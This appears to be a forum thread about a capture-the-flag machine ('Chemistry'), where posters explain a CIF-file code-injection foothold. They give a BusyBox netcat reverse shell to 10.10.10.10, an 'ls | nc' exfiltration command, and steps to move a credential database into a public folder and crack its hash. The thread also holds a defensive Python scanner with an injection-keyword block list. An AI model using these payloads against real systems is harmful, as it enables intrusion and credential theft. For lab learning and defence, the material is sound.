I tried to use ffuf to fuzz but it's DDoS-ing the server and the port forwarding gets disconnected…
And I can limit the rate, but it's too slow…
What should I do to get root???
Don't fuzz, just change the folder.
I see many people having trouble with the payloads and such. This is a spoiler on how to implement it; please only read it if you really need help with FOOTHOLD:
Download the example.cif, then get the PoC exploit from Google.
googlefu: “CIF” “EXPLOIT”
After that, in your Example.cif file,
delete the line right above "_loop".
Then go over to your CIF exploit PoC on the GitHub page, copy the line that has the "system(touch pwnd)" in full, and place it exactly above your _loop line in your Example.cif.
Go back to your PoC and copy the last 2 lines in full, then place them at the end of your Example.cif file too.
As for the payload, try the BusyBox one from Revshells.com
busybox nc 10.10.10.10 9001 -e /bin/bash
NOTE: You have to upload the file and click "view" for the code to execute. Even if you get an internal error, the code will be executed; that's why having a listener and parsing the data there is important!!
Alternate Path:
You don't really need a shell to progress; you can extract the credentials by issuing a command that moves the file containing the credentials (just explore the current folder and you will find it) to the folder /static/ in the current directory. This will allow you to see the file on the webpage; just navigate there and crack the hash.
As for finding out where the file is without a shell, just issue simple commands like this:
Payload: system('ls | nc yourip yourport'). This will forward the results of "ls" to your nc listener; then you issue another command, for example system('mv /path/file/file.db /static/file.db'), and access it on the webpage.
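A defender-side pre-screen for the injection this post describes, added here as an example and not code from the thread or from the Chemistry box: before an uploaded CIF is handed to the parser, the upload handler scans it for code-like tokens inside values and rejects the file if any are found. The thread only names `system(`; the other indicators, the sample CIF text, and the function names are assumptions constructed for this example.

```python
"""Pre-parse screen for uploaded CIF files (constructed example).

A file-upload handler would call is_safe_to_parse() before passing the text to
any CIF parser, and quarantine or reject files that fail. The indicator list
is an assumption; the thread only mentions a system(...) call.
"""

# Tokens that should never appear in crystallographic data values.
# "system(" is the one named in the thread; the rest are assumed, common
# code-injection indicators for Python-based parsers.
CODE_INDICATORS = (
    "system(",
    "popen(",
    "eval(",
    "exec(",
    "__import__",
    "__subclasses__",
)

# Constructed sample input: an ordinary CIF fragment.
BENIGN_CIF = """data_example
_cell_length_a 5.43
_chemical_formula_sum 'Si'
loop_
_atom_site_label
Si1
"""

# Constructed sample input: the same fragment with a code-like value placed
# right above the loop_ block, the shape the thread describes.
SUSPICIOUS_CIF = """data_example
_cell_length_a 5.43
_chemical_formula_sum 'Si; system("touch pwnd")'
loop_
_atom_site_label
Si1
"""


def scan_cif(text):
    """Return (line_number, indicator, line) for every line carrying an indicator.

    Matching is case-insensitive so that SYSTEM( or System( is caught as well.
    """
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        lowered = line.lower()
        for indicator in CODE_INDICATORS:
            if indicator in lowered:
                findings.append((number, indicator, line.strip()))
                break  # one finding per line is enough to reject the file
    return findings


def is_safe_to_parse(text):
    """True when no code-like indicator is present anywhere in the file."""
    return not scan_cif(text)


if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_CIF), ("suspicious", SUSPICIOUS_CIF)):
        verdict = "accept" if is_safe_to_parse(sample) else "reject"
        print(f"{name}: {verdict}")
        for number, indicator, line in scan_cif(sample):
            print(f"  line {number}: found {indicator!r} in {line!r}")
```

The check is deliberately a pre-filter, not a replacement for a fixed parser: it buys time to patch and gives the upload handler something to log, since the thread notes the payload runs even when the user only sees an internal error.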
I just solved the machine, but I need someone to tell me how he found the directory to exploit the vuln to see the root flag, and why it is that directory.
Read the exploit carefully; the folder used on this machine also fits the description.
Found the .db file, any hints on how to find the hash?
Never mind, just found it.
FYI - don’t use 8080…
How do I do a port scan without nmap?
Why would you want to do that?
I just want to enumerate running services on the Chemistry host, but nmap is not available on the host, so I'm looking for another way.
Did you already get a shell on the machine?
Yep
If you have a shell on the machine, do ss -tulpn to see active sockets / what's listening, etc.
Okay, thanks
How do you know the system uses BusyBox? I'm trying to inject the payload in the example.cif, but I don't know if I put it in the incorrect place.
Same, dude.
Does it matter where you put the payload?
Try to grep by the other user on the machine; can you see it using pwd in the app session?
Yeah, that matters. I put it in the correct place and I can get the user flag; the CVE is not very explicit about how to use it.